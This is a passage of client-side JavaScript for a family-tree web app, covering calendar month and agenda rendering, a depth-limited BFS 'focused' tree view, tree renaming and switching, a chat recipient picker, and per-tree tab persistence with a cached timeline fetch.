            const monthContainer = document.getElementById('month-view-container');
            const agendaContainer = document.getElementById('agenda-view-container');

            if (view === 'month') {
                monthBtn.classList.add('bg-primary', 'text-white');
                monthBtn.classList.remove('text-gray-600', 'hover:bg-gray-100');
                agendaBtn.classList.remove('bg-primary', 'text-white');
                agendaBtn.classList.add('text-gray-600', 'hover:bg-gray-100');
                monthContainer.classList.remove('hidden');
                agendaContainer.classList.add('hidden');
            } else {
                agendaBtn.classList.add('bg-primary', 'text-white');
                agendaBtn.classList.remove('text-gray-600', 'hover:bg-gray-100');
                monthBtn.classList.remove('bg-primary', 'text-white');
                monthBtn.classList.add('text-gray-600', 'hover:bg-gray-100');
                agendaContainer.classList.remove('hidden');
                monthContainer.classList.add('hidden');
            }

            renderCurrentCalendarView();
        }

        function changeMonth(delta) {
            currentCalendarDate.setMonth(currentCalendarDate.getMonth() + delta);
            renderCurrentCalendarView();
        }

        function goToToday() {
            currentCalendarDate = new Date();
            renderCurrentCalendarView();
        }

        function renderCurrentCalendarView() {
            if (currentCalendarView === 'month') {
                renderMonthView();
            } else {
                renderAgendaView();
            }
        }

        function renderMonthView() {
            const gridDiv = document.getElementById('calendar-grid');
            const monthYearDiv = document.getElementById('current-month-year');
            if (!gridDiv || !monthYearDiv) return;

            const year = currentCalendarDate.getFullYear();
            const month = currentCalendarDate.getMonth();
            const monthName = currentCalendarDate.toLocaleDateString('en-US', { month: 'long', year: 'numeric' });

            monthYearDiv.textContent = monthName;

            // Get first day of month and number of days
            const firstDay = new Date(year, month, 1).getDay();
            const daysInMonth = new Date(year, month + 1, 0).getDate();
            const today = new Date();

            // Filter visible events for this month
            const monthEvents = calendarEventsCache.filter(event => {
                if (!visibleCalendars.has(event.calendarId)) return false;
                const eventDate = new Date(event.startTime);
                return eventDate.getMonth() === month && eventDate.getFullYear() === year;
            });

            // Create calendar grid
            let html = '<div class="grid grid-cols-7 gap-1">';

            // Day headers
            const days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
            days.forEach(day => {
                html += `<div class="text-center font-semibold text-sm text-gray-600 py-2">${day}</div>`;
            });

            // Empty cells before first day
            for (let i = 0; i < firstDay; i++) {
                html += '<div class="min-h-[100px] bg-gray-50 border border-gray-200 rounded"></div>';
            }

            // Days of month
            for (let day = 1; day <= daysInMonth; day++) {
                const date = new Date(year, month, day);
                const isToday = date.toDateString() === today.toDateString();
                const dayEvents = monthEvents.filter(event => {
                    const eventDate = new Date(event.startTime);
                    return eventDate.getDate() === day;
                });

                html += `
                    <div class="min-h-[100px] border border-gray-200 rounded p-2 ${isToday ? 'bg-blue-50 border-blue-300' : 'bg-white hover:bg-gray-50'} transition-colors">
                        <div class="text-sm font-semibold ${isToday ? 'text-blue-600' : 'text-gray-700'} mb-1">
                            ${day}
                        </div>
                        <div class="space-y-1">
                            ${dayEvents.slice(0, 3).map(event => {
                                const color = event.calendarType === 'personal' ? 'bg-blue-500' : 'bg-green-500';
                                const time = new Date(event.startTime).toLocaleTimeString('en-US', { hour: 'numeric', minute: '2-digit' });
                                return `
                                    <div class="text-xs ${color} text-white px-1 py-0.5 rounded truncate cursor-pointer hover:opacity-80"
                                         title="${event.title} - ${time}">
                                        ${time} ${event.title}
                                    </div>
                                `;
                            }).join('')}
                            ${dayEvents.length > 3 ? `<div class="text-xs text-gray-500">+${dayEvents.length - 3} more</div>` : ''}
                        </div>
                    </div>
                `;
            }

            html += '</div>';
            gridDiv.innerHTML = html;
        }

        function renderAgendaView() {
            const eventListDiv = document.getElementById('event-list');
            if (!eventListDiv) return;

            const visibleEvents = calendarEventsCache
                .filter(event => visibleCalendars.has(event.calendarId))
                .sort((a, b) => new Date(a.startTime) - new Date(b.startTime));

            if (visibleEvents.length === 0) {
                eventListDiv.innerHTML = ebwEmptyState({
                    icon: 'calendar',
                    heading: 'No events yet',
                    body: 'Birthdays and memorial anniversaries appear here automatically as family members are added with dates. You can also add events manually.',
                    learnMoreAnchor: 'calendar',
                });
                return;
            }

            eventListDiv.innerHTML = visibleEvents.map(event => {
                const startDate = new Date(event.startTime);
                const endDate = new Date(event.endTime);
                const color = event.calendarType === 'personal' ? 'border-blue-500' : 'border-green-500';
                const bgColor = event.calendarType === 'personal' ? 'bg-blue-50' : 'bg-green-50';

                return `
                    <div class="border-l-4 ${color} ${bgColor} p-4 rounded-r-lg hover:shadow-md transition-shadow">
                        <div class="flex items-start justify-between">
                            <div class="flex-1">
                                <h4 class="font-semibold text-gray-800">${event.title}</h4>
                                <div class="flex items-center gap-4 mt-2 text-sm text-gray-600">
                                    <span class="flex items-center gap-1">
                                        ${tablerIcon('calendar', { size: 14 })} ${startDate.toLocaleDateString()}
                                    </span>
                                    <span class="flex items-center gap-1">
                                        ${tablerIcon('clock', { size: 14 })} ${startDate.toLocaleTimeString('en-US', { hour: 'numeric', minute: '2-digit' })} - ${endDate.toLocaleTimeString('en-US', { hour: 'numeric', minute: '2-digit' })}
                                    </span>
                                </div>
                                ${event.description ? `<p class="text-sm text-gray-600 mt-2">${escapeHtml(event.description)}</p>` : ''}
                            </div>
                            <span class="text-xs px-2 py-1 rounded ${event.calendarType === 'personal' ? 'bg-blue-200 text-blue-800' : 'bg-green-200 text-green-800'}">
                                ${event.calendarName}
                            </span>
                        </div>
                    </div>
                `;
            }).join('');
        }

        function renderUpcomingEvents() {
            const upcomingDiv = document.getElementById('upcoming-events');
            if (!upcomingDiv) return;

            const now = new Date();
            const upcomingEvents = calendarEventsCache
                .filter(event => {
                    if (!visibleCalendars.has(event.calendarId)) return false;
                    return new Date(event.startTime) >= now;
                })
                .sort((a, b) => new Date(a.startTime) - new Date(b.startTime))
                .slice(0, 5);

            if (upcomingEvents.length === 0) {
                upcomingDiv.innerHTML = '<p class="text-sm text-gray-500">No upcoming events</p>';
                return;
            }

            upcomingDiv.innerHTML = upcomingEvents.map(event => {
                const startDate = new Date(event.startTime);
                const color = event.calendarType === 'personal' ? 'bg-blue-500' : 'bg-green-500';
                const isToday = startDate.toDateString() === now.toDateString();
                const isTomorrow = new Date(now.getTime() + 86400000).toDateString() === startDate.toDateString();

                let dateLabel = startDate.toLocaleDateString('en-US', { month: 'short', day: 'numeric' });
                if (isToday) dateLabel = 'Today';
                if (isTomorrow) dateLabel = 'Tomorrow';

                return `
                    <div class="flex gap-2 p-2 hover:bg-gray-50 rounded cursor-pointer transition-colors">
                        <div class="w-2 h-2 mt-1.5 rounded-full ${color}"></div>
                        <div class="flex-1 min-w-0">
                            <div class="text-sm font-medium text-gray-800 truncate">${event.title}</div>
                            <div class="text-xs text-gray-500">
                                ${dateLabel} • ${startDate.toLocaleTimeString('en-US', { hour: 'numeric', minute: '2-digit' })}
                            </div>
                        </div>
                    </div>
                `;
            }).join('');
        }
        async function loadFamilyTreeData() {
            const displayDiv = document.getElementById('tree-display');
            if (displayDiv) {
                displayDiv.innerHTML = '<p>Finding your family trees...</p>';
            }
            try {
                const myTrees = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/trees`);
                if (myTrees && myTrees.length > 0) {
                    appState.currentTree = myTrees[0].tree; // Store full tree object
                    appState.currentTreeId = myTrees[0].tree.id;
                    // Now that currentTreeId is known, sync the visible
                    // tab to whatever the per-tree key holds — OR to
                    // 'family-tree' if the nav-tap flag is set (which
                    // loadFamilyTreeActiveTab consumes). switchFamilyTreeTab
                    // is the single write site, so this resync also
                    // updates localStorage under the correct treeId key.
                    // Fixes: refresh landed on Family Tree because the
                    // initial FamilyTreePage render read localStorage
                    // under an "unknown" key (currentTreeId still null).
                    if (appState.currentView === 'family-tree-view') {
                        switchFamilyTreeTab(loadFamilyTreeActiveTab(appState.currentTreeId));
                    }
                    // Phase 2: cache the full list for the multi-tree picker
                    // and load the saved perspective for this tree.
                    appState.myTrees = myTrees;
                    appState.ftvPerspective = loadFtvPerspective(appState.currentTreeId);
                    console.log("Fetching persons for tree ID:", appState.currentTreeId);
                    // Add cache-busting to ensure fresh data after adding persons
                    const cacheBuster = `?_t=${Date.now()}`;
                    const persons = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/persons${cacheBuster}`);
                    console.log("Persons fetched:", persons);
                    const relationships = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/relationships${cacheBuster}`);
                    console.log("Relationships fetched:", relationships);

                    // Store tree data in appState for relationship modal
                    appState.treeData = { persons, relationships };
                    appState.personsInTree = persons;

                    // Session 2c: if the Feed Calendar card is on-screen, repopulate
                    // with the fresh persons data. Card was likely showing a "See
                    // upcoming …" fallback because personsInTree was empty at feed
                    // render time. No-op if the card isn't in DOM.
                    if (typeof _populateFeedCalendarCard === 'function') {
                        _populateFeedCalendarCard();
                    }

                    // Only render tree view elements if we're on the family tree page
                    if (displayDiv) {
                        renderPeopleList(persons, relationships);
                        // D3 needs a visible container to measure dimensions correctly.
                        // If the Family Tree tab is hidden (user last viewed Members
                        // or Timeline), rendering D3 here produces a zero-dimensional
                        // tree. We skip; switchFamilyTreeTab('family-tree') re-renders
                        // from cached appState.treeData when the user switches back.
                        const ftvTab = document.getElementById('family-tree-tab-content');
                        const ftvTabVisible = ftvTab && !ftvTab.classList.contains('hidden');
                        if (ftvTabVisible) {
                            renderFamilyTree(persons, relationships);
                        }
                    }
                } else {
                    if (displayDiv) {
                        displayDiv.innerHTML = `<div class="text-center p-8 border-2 border-dashed rounded-lg"><h3 class="text-xl font-semibold">Welcome!</h3><p class="mt-2 text-text-secondary">You are not part of any tree yet. Create one to begin.</p><button onclick="openModal('create-tree-modal')" class="mt-6 px-6 py-2 font-semibold text-white rounded-md bg-primary">Create Family Tree</button></div>`;
                    }
                }
            } catch (error) {
                if (displayDiv) {
                    displayDiv.innerHTML = `<p class="text-error">Could not load your data. ${escapeHtml(error.message)}</p>`;
                }
            }
        }

        // ---- Phase 2: FTV chrome helpers ----
        // The perspective toggle persists per-tree in localStorage. Hidden
        // entirely when viewer === creator (no second perspective exists).
        // Key convention `ebw:ftv:*:{treeId}` per Phase 2 amendment.
        function _ftvPersKey(treeId) { return `ebw:ftv:perspective:${treeId || 'unknown'}`; }
        function loadFtvPerspective(treeId) {
            try {
                const v = localStorage.getItem(_ftvPersKey(treeId));
                return (v === 'creator' || v === 'viewer') ? v : 'viewer';
            } catch (e) { return 'viewer'; }
        }
        function saveFtvPerspective(treeId, value) {
            try { localStorage.setItem(_ftvPersKey(treeId), value); }
            catch (e) { /* noop */ }
        }

        // ---- Phase 2 amendment: Focused viewport mode ----
        // Default-on for users with a claimed Person. BFS depth 2 from the
        // viewer's anchor through parent/child/spouse edges. Footer hint
        // links to full tree. Empty state for viewers with no edges. Layout
        // algorithm unchanged — this is a pure data filter applied before
        // D3 sees the graph.
        //
        // FOCUSED_DEPTH is the most important post-launch tuning lever.
        // If users report "can't see my cousins" change to 3 or 4.
        const FOCUSED_DEPTH = 2;

        function _ftvFocusKey(treeId) { return `ebw:ftv:focusMode:${treeId || 'unknown'}`; }
        function loadFtvFocusMode(treeId) {
            try {
                const v = localStorage.getItem(_ftvFocusKey(treeId));
                return (v === 'focused' || v === 'full') ? v : null;
            } catch (e) { return null; }
        }
        function saveFtvFocusMode(treeId, value) {
            try { localStorage.setItem(_ftvFocusKey(treeId), value); }
            catch (e) { /* noop */ }
        }

        // BFS through parent/child/spouse edges from the anchor. Returns
        // {personIds: Set<int>, edges: Array<rel>}. Polygamous families:
        // every spouse edge counts equally (no primary), co-spouses come
        // along at depth 2 via the shared spouse hop, stepchildren via
        // spouse → child. False positives preferred over false negatives.
        function filterToFocusedNeighborhood(persons, relationships, anchorId, depth) {
            if (anchorId == null) {
                return { personIds: new Set(), edges: [] };
            }
            // Build adjacency: for each Person id, list of (otherId, relType).
            // Spouse + child + parent walks symmetrically (CHILD_OF: child→parent
            // means parent is "neighbor-up" of child and child is "neighbor-down"
            // of parent). Sibling/cousin/aunt-uncle/etc. NOT used for focused
            // traversal — those reach via the parent hop anyway (siblings via
            // shared parent, in-laws via spouse → parent).
            const adj = new Map();
            const pushAdj = (a, b) => {
                if (a == null || b == null) return;
                if (!adj.has(a)) adj.set(a, []);
                adj.get(a).push(b);
            };
            relationships.forEach(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                if (rel.type === 'CHILD_OF') {
                    // from = child, to = parent. Both directions for traversal.
                    pushAdj(fromId, toId);
                    pushAdj(toId, fromId);
                } else if (rel.type === 'SPOUSE_OF') {
                    pushAdj(fromId, toId);
                    pushAdj(toId, fromId);
                }
                // SIBLING_OF intentionally not traversed — siblings reach via
                // shared parent in 2 hops, which keeps the focus on the
                // canonical parent/child/spouse graph and avoids inflating
                // the visible set with sibling-only chains.
            });

            // Standard BFS, depth-limited.
            const visited = new Set([anchorId]);
            let frontier = [anchorId];
            for (let d = 0; d < depth; d++) {
                const next = [];
                frontier.forEach(id => {
                    const neighbors = adj.get(id) || [];
                    neighbors.forEach(n => {
                        if (!visited.has(n)) {
                            visited.add(n);
                            next.push(n);
                        }
                    });
                });
                if (next.length === 0) break;
                frontier = next;
            }

            // Edge subset: only edges where BOTH endpoints are visible.
            const edges = relationships.filter(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;
                return visited.has(fromId) && visited.has(toId);
            });

            return { personIds: visited, edges };
        }
        // Renders the multi-tree picker (dropdown if >1 tree, static otherwise)
        // and updates the perspective toggle visibility/state. Called after
        // each renderFamilyTree so the chrome reflects the latest tree state.
        function renderFtvChrome() {
            const picker = document.getElementById('ebw-ftv-tree-picker');
            const trees = appState.myTrees || [];
            const activeEntry = trees.find(t => t.tree.id === appState.currentTreeId);
            const isCreator = activeEntry && activeEntry.role === 'creator';
            const renameBtn = isCreator
                ? `<button type="button" class="ebw-ftv-rename-btn" title="Rename tree" aria-label="Rename tree" onclick="event.stopPropagation(); openRenameTreeModal();">✎</button>`
                : '';
            if (picker) {
                if (trees.length > 1) {
                    const active = activeEntry || trees[0];
                    const activeName = (active.tree.name || 'Family') + ' ▾';
                    picker.classList.add('is-dropdown');
                    picker.innerHTML = `
                        <span onclick="event.stopPropagation(); toggleFtvTreePicker()" style="cursor:pointer;">${escapeHtml(activeName)}</span>
                        ${renameBtn}
                        <div id="ebw-ftv-tree-picker-menu" class="ebw-ftv-tree-picker-menu">
                            ${trees.map(t => `
                                <div class="ebw-ftv-tree-picker-item${t.tree.id === appState.currentTreeId ? ' active' : ''}"
                                     onclick="switchActiveTree(${t.tree.id})">
                                    ${t.tree.id === appState.currentTreeId ? '✓ ' : ''}${escapeHtml(t.tree.name || 'Family')}
                                </div>
                            `).join('')}
                        </div>
                    `;
                } else {
                    picker.classList.remove('is-dropdown');
                    picker.innerHTML = `<span>${escapeHtml((appState.currentTree && appState.currentTree.name) || '')}</span>${renameBtn}`;
                }
            }
            // Perspective toggle: only visible when viewer ≠ creator.
            const toggle = document.getElementById('ebw-ftv-perspective');
            if (toggle) {
                const viewerId = appState._ftvViewerPersonId;
                const creatorId = appState._ftvCreatorPersonId;
                const showToggle = viewerId != null && creatorId != null && viewerId !== creatorId;
                toggle.style.display = showToggle ? 'flex' : 'none';
                if (showToggle) {
                    const active = loadFtvPerspective(appState.currentTreeId);
                    toggle.querySelectorAll('.ebw-ftv-toggle-btn').forEach(btn => {
                        if (btn.dataset.perspective === active) btn.classList.add('active');
                        else btn.classList.remove('active');
                    });
                    // Tier 2 ⓘ: explain the perspective toggle.
                    const infoSlot = document.getElementById('ebw-ftv-perspective-info');
                    if (infoSlot && !infoSlot.innerHTML.trim()) {
                        infoSlot.innerHTML = ebwInfoGlyph(
                            'ftv-perspective',
                            "Family relationships are relative. My perspective labels them from your card; Tree creator's view labels them from the creator's."
                        );
                    }
                }
            }

            // Phase 2 amendment: focus toggle state + disabled-when-no-anchor.
            const focusEl = document.getElementById('ebw-ftv-focus');
            if (focusEl) {
                const viewerHasClaim = appState._ftvViewerPersonId != null;
                const activeFocus = appState.ftvFocusMode || (viewerHasClaim ? 'focused' : 'full');
                focusEl.querySelectorAll('.ebw-ftv-toggle-btn').forEach(btn => {
                    const isFocusedBtn = btn.dataset.focus === 'focused';
                    if (btn.dataset.focus === activeFocus) btn.classList.add('active');
                    else btn.classList.remove('active');
                    // Disable Focused button when no claimed Person.
                    if (isFocusedBtn && !viewerHasClaim) {
                        btn.disabled = true;
                        btn.title = 'Claim your profile to use Focused view';
                    } else {
                        btn.disabled = false;
                        btn.removeAttribute('title');
                    }
                });
                // Tier 2 ⓘ: explain focused vs full view.
                const focusInfoSlot = document.getElementById('ebw-ftv-focus-info');
                if (focusInfoSlot && !focusInfoSlot.innerHTML.trim()) {
                    focusInfoSlot.innerHTML = ebwInfoGlyph(
                        'ftv-focus',
                        'Focused shows you and everyone within two family hops. Full tree shows everyone on the tree.'
                    );
                }
            }
        }
        function toggleFtvTreePicker() {
            const menu = document.getElementById('ebw-ftv-tree-picker-menu');
            if (!menu) return;
            const willOpen = !menu.classList.contains('open');
            menu.classList.toggle('open', willOpen);
            if (willOpen) {
                // Close on next outside click OR Escape.
                const closeMenu = (ev) => {
                    if (ev && ev.type === 'click' && menu.contains(ev.target)) return;
                    if (ev && ev.type === 'keydown' && ev.key !== 'Escape') return;
                    menu.classList.remove('open');
                    document.removeEventListener('click', closeMenu, true);
                    document.removeEventListener('keydown', closeMenu, true);
                };
                // Defer so the click that opened the menu doesn't immediately close it.
                setTimeout(() => {
                    document.addEventListener('click', closeMenu, true);
                    document.addEventListener('keydown', closeMenu, true);
                }, 0);
            }
        }
        function openRenameTreeModal() {
            const input = document.getElementById('rename-tree-input');
            const errEl = document.getElementById('rename-tree-error');
            if (input) input.value = (appState.currentTree && appState.currentTree.name) || '';
            if (errEl) { errEl.textContent = ''; errEl.classList.add('hidden'); }
            openModal('rename-tree-modal');
            setTimeout(() => { input?.focus(); input?.select(); }, 50);
        }

        async function handleRenameTree(event) {
            if (event) event.preventDefault();
            const input = document.getElementById('rename-tree-input');
            const errEl = document.getElementById('rename-tree-error');
            const submitBtn = document.querySelector('#rename-tree-form button[type="submit"]');
            const newName = (input?.value || '').trim();
            const treeId = appState.currentTreeId;

            if (errEl) { errEl.textContent = ''; errEl.classList.add('hidden'); }
            if (!newName) {
                if (errEl) { errEl.textContent = 'Please enter a name.'; errEl.classList.remove('hidden'); }
                return;
            }
            if (newName === (appState.currentTree && appState.currentTree.name)) {
                closeModal('rename-tree-modal');
                return;
            }
            if (!treeId) return;

            if (submitBtn) { submitBtn.disabled = true; submitBtn.textContent = 'Saving...'; }
            try {
                const res = await apiFetch(`${API_BASE_URL}/trees/${treeId}`, {
                    method: 'PATCH',
                    body: { name: newName },
                });
                const updated = res?.tree;
                const finalName = (updated && updated.name) || newName;
                if (appState.currentTree) appState.currentTree.name = finalName;
                const entry = (appState.myTrees || []).find(t => t.tree.id === treeId);
                if (entry) entry.tree.name = finalName;
                closeModal('rename-tree-modal');
                // Update Members panel title + FTV chrome inline (no full re-render).
                const titleEl = document.getElementById('people-panel-title');
                if (titleEl) titleEl.textContent = finalName || 'My Family Tree';
                try { renderFtvChrome(); } catch (e) { /* noop */ }
            } catch (err) {
                const msg = (err && err.message) ? err.message : 'Something went wrong. Please try again.';
                if (errEl) { errEl.textContent = msg; errEl.classList.remove('hidden'); }
            } finally {
                if (submitBtn) { submitBtn.disabled = false; submitBtn.textContent = 'Save'; }
            }
        }

        function switchActiveTree(treeId) {
            const trees = appState.myTrees || [];
            const next = trees.find(t => t.tree.id === treeId);
            if (!next) return;
            appState.currentTree = next.tree;
            appState.currentTreeId = next.tree.id;
            // Apply the target tree's saved active tab before data lands.
            // Keeps per-tree tab persistence honest: if tree B was last on
            // Members, switching from tree A (on Family Tree) shows tree B's
            // Members, not tree A's active tab bleeding across.
            switchFamilyTreeTab(loadFamilyTreeActiveTab(next.tree.id));
            // Re-fetch persons + relationships for the new tree.
            loadFamilyTreeData();
        }
        function setFtvPerspective(value) {
            if (value !== 'viewer' && value !== 'creator') return;
            appState.ftvPerspective = value;
            saveFtvPerspective(appState.currentTreeId, value);
            // Re-render from cached data — no network round-trip.
            if (appState.treeData && appState.treeData.persons) {
                renderFamilyTree(appState.treeData.persons, appState.treeData.relationships || []);
            }
        }
        // Phase 2 amendment: focus-mode handler. Disabled when viewer has
        // no claimed Person (no anchor to BFS from).
        // Toggle the canvas class to match the given mode. `ebw-ftv-
        // full-active` disengages the flex-fill CSS regime that Focused
        // needs (see main.css `.ebw-ftv-canvas:not(.ebw-ftv-full-active)`
        // rules). Kept as a single-write-site helper — every path that
        // changes mode must go through here (see setFtvFocusMode).
        // renderFamilyTree also calls it defensively at its top so
        // non-setFtvFocusMode entry points (initial page load, tree
        // switch, data refresh) can't leave a stale class in place.
        function _applyFtvModeClass(mode) {
            const canvas = document.querySelector('.ebw-ftv-canvas');
            if (!canvas) return;
            if (mode === 'full') {
                canvas.classList.add('ebw-ftv-full-active');
            } else {
                canvas.classList.remove('ebw-ftv-full-active');
                canvas.classList.remove('ebw-ftv-scrollable');
            }
        }

        // Pending rAF handle for a mode switch. Rapid toggle spam
        // (Focused ↔ Full tapped as fast as possible) cancels the
        // in-flight rAF and reschedules — so the final mode is what
        // actually renders. Prevents "stuck mid-toggle" bugs where
        // measurement lands during a class transition.
        let _ftvModeSwitchRaf = null;

        function setFtvFocusMode(value) {
            if (value !== 'focused' && value !== 'full') return;
            if (value === 'focused' && appState._ftvViewerPersonId == null) {
                // No anchor available — can't BFS. Silently no-op.
                return;
            }
            // Strictly ordered switch sequence per spec:
            //   1. Set mode state
            //   2. Toggle the class (engages/disengages the CSS regime)
            //   3. requestAnimationFrame — give the browser a full paint
            //      frame to commit the layout under the new class before
            //      we measure anything from it
            //   4. renderFamilyTree — measures + renders against the
            //      settled dimensions
            // Never measures in the same frame as the class flip.
            appState.ftvFocusMode = value;
            saveFtvFocusMode(appState.currentTreeId, value);
            _applyFtvModeClass(value);
            // Coalesce toggle spam.
            if (_ftvModeSwitchRaf !== null) cancelAnimationFrame(_ftvModeSwitchRaf);
            _ftvModeSwitchRaf = requestAnimationFrame(() => {
                _ftvModeSwitchRaf = null;
                if (appState.treeData && appState.treeData.persons) {
                    renderFamilyTree(appState.treeData.persons, appState.treeData.relationships || []);
                }
            });
        }

        // Switch between tree view and timeline view
        // ---- Family Tree page: tabbed layout ----
        // Three tabs: family-tree (FTV, default), members (Phase 1 list),
        // timeline. Active tab persists per-tree in localStorage under
        // `ebw:familyTree:activeTab:{treeId}`. Reload restores the last-
        // viewed tab. Tree-switch applies the target tree's saved tab.
        // ---- Chat master-detail state (mobile) ----
        // Tracks which pane is visible on < md: 'list' or 'thread'. Ignored
        // on md+ where both panes render side-by-side. Reset to 'list' on
        // navigate-away so returning to Chat opens the list first.
        let _chatMobilePane = 'list';
        function setChatMobilePane(pane) {
            if (pane !== 'list' && pane !== 'thread') return;
            _chatMobilePane = pane;
            const el = document.getElementById('chat-view');
            if (el) el.setAttribute('data-chat-pane', pane);
        }
        // ---- Recipient picker (custom in-modal dropdown replacing native <select>) ----
        // Populates from the hidden <select id="message-recipient"> so the form
        // submission path (reads select.value) is unchanged.
        function openRecipientPicker() {
            const picker = document.getElementById('recipient-picker');
            const list = document.getElementById('recipient-picker-list');
            const select = document.getElementById('message-recipient');
            if (!picker || !list || !select) return;
            const options = Array.from(select.options).filter(o => o.value);
            if (options.length === 0) {
                list.innerHTML = '<p class="p-4 text-sm text-gray-500 text-center">No family members available.</p>';
            } else {
                list.innerHTML = options.map(o => {
                    const label = o.textContent || '';
                    const labelAttr = label.replace(/"/g, '&quot;');
                    return `<button type="button" onclick="selectRecipient('${o.value}', &quot;${labelAttr}&quot;)"
                        class="w-full text-left px-4 py-3 hover:bg-gray-100 border-b border-gray-100">
                        ${escapeHtml(label)}
                    </button>`;
                }).join('');
            }
            // Simple hidden → shown toggle. The picker's two-fixed-layer
            // structure (backdrop + card as separate fixed siblings) avoids
            // the earlier iOS paint deferral without needing the double-rAF
            // opacity dance, which was causing scroll flicker inside the
            // list. Body scroll lock stops the page underneath from
            // scrolling behind the picker on iOS.
            picker.classList.remove('hidden');
            document.body.style.overflow = 'hidden';
        }
        function closeRecipientPicker() {
            const picker = document.getElementById('recipient-picker');
            if (!picker) return;
            picker.classList.add('hidden');
            document.body.style.overflow = '';
        }
        function selectRecipient(value, label) {
            const select = document.getElementById('message-recipient');
            const labelEl = document.getElementById('message-recipient-label');
            if (select) select.value = value;
            if (labelEl) {
                labelEl.textContent = label;
                labelEl.classList.remove('text-gray-500');
                labelEl.classList.add('text-gray-800');
            }
            closeRecipientPicker();
        }

        function backToConversationList() {
            setChatMobilePane('list');
            // Detach the Firestore snapshot listener when leaving the
            // thread pane; re-opens on next selectConversation.
            if (appState.firestoreUnsubscribe) {
                appState.firestoreUnsubscribe();
                appState.firestoreUnsubscribe = null;
            }
            appState.selectedConversationId = null;
        }

        const _FAMILY_TREE_TABS = ['family-tree', 'members', 'timeline'];
        function _familyTreeTabKey(treeId) { return `ebw:familyTree:activeTab:${treeId || 'unknown'}`; }
        // Direct nav (sidebar / mobile drawer / bottom nav tap on "Tree")
        // always lands on the Family Tree tab regardless of last-viewed
        // tab. The flag is honored once by loadFamilyTreeActiveTab —
        // which runs FROM inside loadFamilyTreeData's post-currentTreeId
        // resync (see call site at ~L6764) so the resulting
        // switchFamilyTreeTab call writes under the correct treeId key.
        // Doing this pre-currentTreeId would write under the "unknown"
        // key and leave the actual per-tree entry stale, which is the
        // regression we're closing here.
        let _ftvForceOpenFamilyTreeTab = false;
        function navigateToFamilyTreeFromNav() {
            _ftvForceOpenFamilyTreeTab = true;
            navigateToView('family-tree-view');
        }
        function loadFamilyTreeActiveTab(treeId) {
            if (_ftvForceOpenFamilyTreeTab) {
                _ftvForceOpenFamilyTreeTab = false;
                return 'family-tree';
            }
            try {
                const v = localStorage.getItem(_familyTreeTabKey(treeId));
                return _FAMILY_TREE_TABS.includes(v) ? v : 'family-tree';
            } catch (e) { return 'family-tree'; }
        }
        function saveFamilyTreeActiveTab(treeId, value) {
            try { localStorage.setItem(_familyTreeTabKey(treeId), value); }
            catch (e) { /* noop */ }
        }

        function switchFamilyTreeTab(tab) {
            if (!_FAMILY_TREE_TABS.includes(tab)) return;

            // Update tab-button active state via data-attribute selectors —
            // avoids per-id class juggling and keeps this loop future-proof
            // for extra tabs.
            document.querySelectorAll('[data-family-tree-tab]').forEach(btn => {
                const isActive = btn.dataset.familyTreeTab === tab;
                btn.classList.toggle('border-primary', isActive);
                btn.classList.toggle('text-primary', isActive);
                btn.classList.toggle('border-transparent', !isActive);
                btn.classList.toggle('text-gray-500', !isActive);
            });

            _FAMILY_TREE_TABS.forEach(t => {
                const panel = document.getElementById(`${t}-tab-content`);
                if (panel) panel.classList.toggle('hidden', t !== tab);
            });

            saveFamilyTreeActiveTab(appState.currentTreeId, tab);

            // Tab-specific side effects.
            if (tab === 'family-tree') {
                // D3 needs measurable dimensions to render; the FTV render is
                // skipped when the tab container is hidden. Redraw from
                // cached data on show so recently-added persons/relationships
                // appear when switching in from another tab.
                if (appState.treeData && appState.treeData.persons && document.getElementById('tree-display')) {
                    renderFamilyTree(appState.treeData.persons, appState.treeData.relationships || []);
                }
            } else if (tab === 'timeline') {
                loadTimelineData();
            }
        }

        // Load and render timeline data
        // Store all timeline events globally for filtering
        let allTimelineEvents = [];
        let allPeopleForFilter = {};

        // Per-tree in-memory cache. Timeline is a graph-derived aggregation
        // (all birth/death/marriage events + posts + photos across the tree)
        // so the backend query is heavy for large trees. Cache TTL 60s so
        // tab-switching within a minute doesn't re-fetch, but data isn't
        // more than a minute stale after adding a person or event.
        const _timelineCache = new Map();  // treeId → { at: ms, response: {} }
        const TIMELINE_CACHE_TTL_MS = 60_000;

        function _applyTimelineResponse(response) {
            const eventsDiv = document.getElementById('timeline-events');
            const emptyDiv = document.getElementById('timeline-empty');
            const loadingDiv = document.getElementById('timeline-loading');
            if (loadingDiv) loadingDiv.classList.add('hidden');
            if (!eventsDiv || !emptyDiv) return;

            if (response.events && response.events.length > 0) {
                allTimelineEvents = response.events;
                allPeopleForFilter = {};
                response.events.forEach(event => {
                    if (event.personId && event.title) {
                        const match = event.title.match(/^(.+?) (was born|married)/);
                        if (match && match[1]) {
                            allPeopleForFilter[event.personId] = match[1];
                        }
                    }
                });

                const filterSelect = document.getElementById('timeline-person-filter');
                if (filterSelect) {
                    filterSelect.innerHTML = '<option value="">All People</option>' +
                        Object.entries(allPeopleForFilter)
                            .map(([personId, name]) => `<option value="${personId}">${name}</option>`)
                            .join('');
                }

                eventsDiv.classList.remove('hidden');
                renderTimeline(response.events);
            } else {
                emptyDiv.classList.remove('hidden');
            }
        }

        async function loadTimelineData() {
            const loadingDiv = document.getElementById('timeline-loading');
            const eventsDiv = document.getElementById('timeline-events');
            const emptyDiv = document.getElementById('timeline-empty');

            if (!loadingDiv || !eventsDiv || !emptyDiv) return;

            const treeId = appState.currentTreeId;
            const cached = _timelineCache.get(treeId);
            const fresh = cached && (Date.now() - cached.at) < TIMELINE_CACHE_TTL_MS;

            // Fresh cache — render synchronously, skip network + spinner.
            if (fresh) {
                _applyTimelineResponse(cached.response);
                return;
            }

            // Show loading (skeleton spinner)
            loadingDiv.classList.remove('hidden');
            eventsDiv.classList.add('hidden');
            emptyDiv.classList.add('hidden');

            try {
                const response = await apiFetch(`${API_BASE_URL}/timeline`);
                _timelineCache.set(treeId, { at: Date.now(), response });
                _applyTimelineResponse(response);
            } catch (error) {
                console.error('Error loading timeline:', error);
                loadingDiv.classList.add('hidden');
                emptyDiv.classList.remove('hidden');
            }
        }

        // Invalidate the timeline cache when the underlying graph changes
        // (new person / edge / event / post). Called from mutation handlers
